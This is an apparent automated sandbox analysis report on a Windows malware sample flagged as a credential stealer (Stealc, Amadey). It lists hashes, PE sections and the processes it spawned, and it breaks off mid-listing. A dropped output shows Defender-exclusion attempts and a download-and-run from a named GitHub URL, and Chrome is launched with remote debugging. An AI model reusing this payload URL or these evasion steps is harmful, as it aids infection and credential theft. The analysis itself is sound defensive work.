                                                                                                                                                                                                                        Preview:.gb_P{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ja{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_Ka{fill:#f9ab00}.gb_F .gb_Ka{fill:#fdd663}.gb_La>.gb_Ka{fill:#d93025}.gb_F .gb_La>.gb_Ka{fill:#f28b82}.gb_La>.gb_Ma{fill:white}.gb_Ma,.gb_F .gb_La>.gb_Ma{fill:#202124}.gb_Na{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3

                                                                                                                                                                                                                        Chrome Cache Entry: 148

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):1660
                                                                                                                                                                                                                        Entropy (8bit):4.301517070642596
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
                                                                                                                                                                                                                        MD5:554640F465EB3ED903B543DAE0A1BCAC
                                                                                                                                                                                                                        SHA1:E0E6E2C8939008217EB76A3B3282CA75F3DC401A
                                                                                                                                                                                                                        SHA-256:99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
                                                                                                                                                                                                                        SHA-512:462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        URL:https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
                                                                                                                                                                                                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3

                                                                                                                                                                                                                        \Device\ConDrv

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe
                                                                                                                                                                                                                        File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):651
                                                                                                                                                                                                                        Entropy (8bit):5.005300745133476
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12:clyD3Cg81ye4A28AArWII2SGN6TaWyL09Wy+621QYpTNfjLIayGNT:nDp81sA3CII2S7TaF094dj8ay+
                                                                                                                                                                                                                        MD5:4CE88B8F30E3F8A3EEA68AB1E36F2C93
                                                                                                                                                                                                                        SHA1:3666EC0F669828337C70395AEACF5E3345DD9B20
                                                                                                                                                                                                                        SHA-256:EA6539794748C54FD71C240FBEC387EB9950437C45EEA8C45D5FDA5053710D60
                                                                                                                                                                                                                        SHA-512:0C449FDD18E0496A1BACA562BBD10E63DCF97B04B24DF4A56DDDE80BE7B0A263C166B9ECF07A530D2ED393F421FAB23A4BE141BA79FBD3D5B89D582A4452F7CE
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:Welcome to the 'Guess the Number' game!..I've picked a number between 1 and 100. Try to guess it!..Enter your guess: .Time's up! The correct number is 66...Congratulations! You guessed the number 66 in 1 attempts!..Folder 'YQNZByFp' created successfully at C:\...Failed to add folder to Microsoft Defender exclusions. Exit code: 1..Failed to add folder 'Users' to Microsoft Defender exclusions. Exit code: 1..Downloading file from https://github.com/arizaseeen/ariiiza/raw/refs/heads/main/jyidkjkfhjawd.exe.....File downloaded successfully to C:\YQNZByFp\jyidkjkfhjawd.exe...Running file C:\YQNZByFp\jyidkjkfhjawd.exe.....File executed successfully...

                                                                                                                                                                                                                        \Device\Null

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                                        File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):27
                                                                                                                                                                                                                        Entropy (8bit):3.7541634277688805
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:R/wCu3cov:R/wHZv
                                                                                                                                                                                                                        MD5:F8AED8C00E9E1A62294ECA2A412564A3
                                                                                                                                                                                                                        SHA1:290081C4084D420572397AB514A9AD638BB7287F
                                                                                                                                                                                                                        SHA-256:8ECDC0C25D6979A673BCD2342A543E0C63056F8CD053D5C8A2B8F5F74355E1D7
                                                                                                                                                                                                                        SHA-512:A2C1CE924FD68DE7883F31B1C29F698A5A9ED26C5CB42F6340E19CF3FCD78EDC969D977FD9DEA064E32B6E448E51B4CE2AF187623ACA809821298C23B19B13EA
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:ERROR: Access is denied....

                                                                                                                                                                                                                        Static File Info

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Entropy (8bit):7.950439382610089
                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                        File name:5EfYBe3nch.exe
                                                                                                                                                                                                                        File size:1'858'048 bytes
                                                                                                                                                                                                                        MD5:2ba2329d40af33806efdb0bbe5aeb0ad
                                                                                                                                                                                                                        SHA1:31c237c3d02833010e8788c653e03c8637c4927f
                                                                                                                                                                                                                        SHA256:cdf06ee922f209a5ea0f3a2f05acc8813e0cc98384493a54373cc246e8ad1095
                                                                                                                                                                                                                        SHA512:205466f83a5a82967d71a5799bfa1e0a99ff836e4943e0df2a6b6a888d4132b36bf3219a1659e8ae7b02643ec2739dd8670dae993af7116aefeeee68035f2a9a
                                                                                                                                                                                                                        SSDEEP:49152:EtagWfvpLIVOXhJRTgNoGOHEjSrIGKYwPmm:EcHfyVOxJKiGOHEesGKhPmm
                                                                                                                                                                                                                        TLSH:4385336F2C95ACFEE7D907748CB3466EE3BD6B4242DE172C2B4738D74814202D945A8B
                                                                                                                                                                                                                        File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L... .pg..............................I...........@...........................I.....Z7....@.................................Y@..m..

                                                                                                                                                                                                                        File Icon

                                                                                                                                                                                                                        Icon Hash:90cececece8e8eb0

                                                                                                                                                                                                                        Static PE Info

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Entrypoint:0x899000
                                                                                                                                                                                                                        Entrypoint Section:.taggant
                                                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                        Time Stamp:0x67701720 [Sat Dec 28 15:20:00 2024 UTC]
                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                        OS Version Major:6
                                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                                        File Version Major:6
                                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                                        Subsystem Version Major:6
                                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                                        Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                                                                                                                                                                        Entrypoint Preview

                                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                                        jmp 00007FD6691C13BAh
                                                                                                                                                                                                                        pabsb mm0, qword ptr [eax]
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        jmp 00007FD6691C33B5h
                                                                                                                                                                                                                        add byte ptr [ebx], cl
                                                                                                                                                                                                                        or al, byte ptr [eax]
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], dh
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add al, byte ptr [eax]
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [ebx], cl
                                                                                                                                                                                                                        or al, byte ptr [eax]
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [ecx], al
                                                                                                                                                                                                                        add byte ptr [eax], 00000000h
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        adc byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add cl, byte ptr [edx]
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al

                                                                                                                                                                                                                        Data Directories

                                                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x540590x6d.idata
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x530000x2b0.rsrc
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x541f80x8.idata
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                        Sections

                                                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                        0x10000x520000x260006d3c230488b2120399595bf4cbf75c76False0.9998972039473685data7.98283360449281IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                        .rsrc0x530000x2b00x400fe67bb2a9df3150b9c94de8bd81ed8a0False0.3603515625data5.186832724894366IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                        .idata 0x540000x10000x20039a711a7d804ccbc2a14eea65cf3c27eFalse0.154296875data1.0789976601211375IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                        0x550000x2a70000x2003a1c09bedc09f6115ecbe8052784f093unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                        dalsczsh0x2fc0000x19c0000x19bc0045fc238cfb5bafbba08ab25daeadc94eFalse0.9948622258272617data7.955197108012415IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                        bgqwnedu0x4980000x10000x4005d274984926cd5c1d659325dbd07398eFalse0.8154296875data6.292179251946629IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                        .taggant0x4990000x30000x22003f30c952a6533ea9d1efa37735621f6bFalse0.06284466911764706DOS executable (COM)0.6054614960816704IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                                                                                                                        Resources

                                                                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                        RT_MANIFEST0x530580x256ASCII text, with CRLF line terminators0.5100334448160535

                                                                                                                                                                                                                        Imports

                                                                                                                                                                                                                        DLLImport
                                                                                                                                                                                                                        kernel32.dlllstrcpy

                                                                                                                                                                                                                        Network Behavior

                                                                                                                                                                                                                        Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.

                                                                                                                                                                                                                        Statistics

                                                                                                                                                                                                                        CPU Usage

                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                        Memory Usage

                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                                        Behavior

                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                        System Behavior

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                        Start time:03:47:53
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\5EfYBe3nch.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\5EfYBe3nch.exe"
                                                                                                                                                                                                                        Imagebase:0x9c0000
                                                                                                                                                                                                                        File size:1'858'048 bytes
                                                                                                                                                                                                                        MD5 hash:2BA2329D40AF33806EFDB0BBE5AEB0AD
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1726694915.00000000014B2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1743404836.00000000014AC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:2
                                                                                                                                                                                                                        Start time:03:48:14
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe"
                                                                                                                                                                                                                        Imagebase:0x730000
                                                                                                                                                                                                                        File size:5'163'520 bytes
                                                                                                                                                                                                                        MD5 hash:8AFA0085DF245EA0BE67A6A4BABA228D
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2278140862.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000002.00000002.2278140862.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000002.00000002.2273078519.0000000000731000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2273078519.00000000007FC000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                                                        Start time:03:48:19
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exe"
                                                                                                                                                                                                                        Imagebase:0x480000
                                                                                                                                                                                                                        File size:3'243'520 bytes
                                                                                                                                                                                                                        MD5 hash:375CE25C0529862F6EE716A3E001BB0E
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000005.00000002.1998815042.0000000000481000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                                                        Start time:03:48:22
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                                                                                                                                                                                                        Imagebase:0xfa0000
                                                                                                                                                                                                                        File size:3'243'520 bytes
                                                                                                                                                                                                                        MD5 hash:375CE25C0529862F6EE716A3E001BB0E
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000002.2049080797.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:7
                                                                                                                                                                                                                        Start time:03:48:22
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                        Imagebase:0xfa0000
                                                                                                                                                                                                                        File size:3'243'520 bytes
                                                                                                                                                                                                                        MD5 hash:375CE25C0529862F6EE716A3E001BB0E
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000007.00000002.2048763354.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:8
                                                                                                                                                                                                                        Start time:03:48:23
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                                                                                                                                                                                                                        Imagebase:0x7ff76e190000
                                                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:10
                                                                                                                                                                                                                        Start time:03:48:24
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2596 --field-trial-handle=2532,i,194429869990168625,15952654104286526846,262144 /prefetch:8
                                                                                                                                                                                                                        Imagebase:0x7ff76e190000
                                                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:11
                                                                                                                                                                                                                        Start time:03:48:48
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\GIIIIJDHJE.exe"
                                                                                                                                                                                                                        Imagebase:0x240000
                                                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:12
                                                                                                                                                                                                                        Start time:03:48:48
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                        File size:862'208 bytes
